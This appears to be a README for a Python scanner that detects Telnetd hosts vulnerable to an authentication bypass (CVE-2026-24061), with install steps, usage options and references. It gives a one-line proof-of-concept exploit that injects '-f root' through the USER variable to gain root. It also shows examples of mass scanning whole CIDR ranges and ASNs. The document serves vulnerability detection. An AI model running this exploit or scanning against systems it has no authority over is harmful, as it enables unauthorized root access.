A Powerful, Fast, and Elegant scanner for detecting vulnerable Telnetd services affected by CVE-2026-24061. Built with pure Python standard library - zero external dependencies required.
-A32D2A?style=for-the-badge){kind=icon}
- βοΈ License
- 𧩠Features
- β£οΈ Vulnerability Details
- β‘ Service Status
- π§ͺ Proof of Concept (PoC)
- π₯ Affected Versions
- 𧡠Patched Versions
- βοΈ Attack Vector
- π¨ CVSS Score
- π οΈ Installation
- π Usage
- π― Examples
- βοΈ Demos
- π References
- π High-Performance Scanning β Multi-Threaded Architecture with Configurable Thread Count.
- π Flexible Target Input β Support for Single IPs, CIDR Ranges, ASN Lookups, and File-Based Lists.
- π Real-Time Progress β Beautiful Unicode-Based UI with Live Progress Bars.
- π€ ASN Intelligence β Automatic Prefix Fetching from RADB, BGPView, and HackerTarget APIs.
- π GEO Location Intelligence β Real-Time ASN, Provider and Location Fetching from ipapi API.
- πΎ Graceful Interruption β CTRL+C Handling with Automatic Result Saving.
- π Detailed Logging β Configurable Verbosity Levels for Debugging.
- π‘οΈ Safe Scanning β Built-In Limits to Prevent Accidental Massive Scans.
- π¨ Clean Output β Professional Bordered Tables with Scan Summaries.
- π¦ Zero Dependencies β Pure Python 3.x Standard Library Only.
CVE-2026-24061 is a critical authentication bypass vulnerability in GNU InetUtils Telnetd that allows unauthenticated remote attackers to gain root access by exploiting the NEW-ENVIRON option handling.
The following is the Telnetd service configuration on the target host side.
And here is the Proof of Concept (PoC) for this vulnerability, which can be executed manually from the attacker's host simply by running the command USER="-f root" telnet -a <TARGET_HOST> 23.
- GNU InetUtils >=1.9.3 <=2.7.
- Various embedded Linux distributions.
- IoT devices with vulnerable Telnetd implementations.
- GNU InetUtils >=2.8.
The vulnerability exploits improper validation of the USER environment variable in the telnet NEW-ENVIRON (RFC 1572) option negotiation, allowing attackers to inject malicious values like -f root to bypass authentication.
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner
# Make Executable
sudo chmod +x twenty-three-scanner.py
# Run the Script
sudo python3 twenty-three-scanner.py -hThe following is a manual for the Twenty-Three Scanner tool that can be used to detect the vulnerability CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass.
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
[--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]
CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass
options:
-h, --help show this help message and exit
Target Options:
-t TARGET, --target TARGET
target IP, CIDR, or comma-separated list (can be used multiple times)
-f FILE, --file FILE file containing targets (one per line, supports comments with #)
-a ASN, --asn ASN autonomous system number (e.g., AS10111 or 10111)
Scan Options:
-p PORT, --port PORT target port(s), comma-separated (default: 23)
--threads N number of concurrent threads (default: 50)
--user-value VALUE USER environment variable value for exploit (default: '-f root')
Timeout Options:
--connect-timeout SEC
TCP connection timeout in seconds (default: 3.0)
--read-timeout SEC socket read timeout in seconds (default: 2.0)
--id-timeout SEC 'id' command response timeout in seconds (default: 2.0)
Limit Options:
--max-hosts-per-cidr N
maximum hosts to scan per CIDR block (default: 1024)
--max-total-hosts N maximum total hosts across all targets (default: 50000)
--skip-large-networks
skip networks larger than /16 (avoids accidentally scanning huge ranges)
Output Options:
-o FILE, --output FILE
save vulnerable hosts to file (format: IP:PORT)
-v, --verbose enable verbose debug loggingAnd here are some examples of how to use the command.
# Scan Single IP Address, and Single Port
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23
# Scan Single IP Address, and Multiple Ports
sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323
# Scan Multiple IP Addresses, and Single Port
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23
# Scan Multiple Addresses, and Multiple Ports
sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323
# Scan CIDR Range, and Single Port with Results
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt
# Scan CIDR Range, and Multiple Ports with Results
sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt
# Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output
sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt
# Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output
sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt
# Scan ASN and Single Port with Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100
# Scan ASN and Multiple Ports with Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100
# Scan ASN with Custom Limits and Custom Threads
sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100Scan Single IP Address with Multiple Ports.
Scan Multiple IP Addresses with Single Port.
Scan CIDR Range with Single Port.
Scan ASN with Multiple Ports.
Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output.
- Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
- NVD - CVE-2026-24061
- CVE Record: CVE-2026-24061
- Inetutils - GNU network utilities
- [SECURITY] [DLA 4453-1] inetutils security update
- GNU InetUtils Security Advisory: remote authentication by-pass in telnet
- GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
- GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
- GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
- CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs
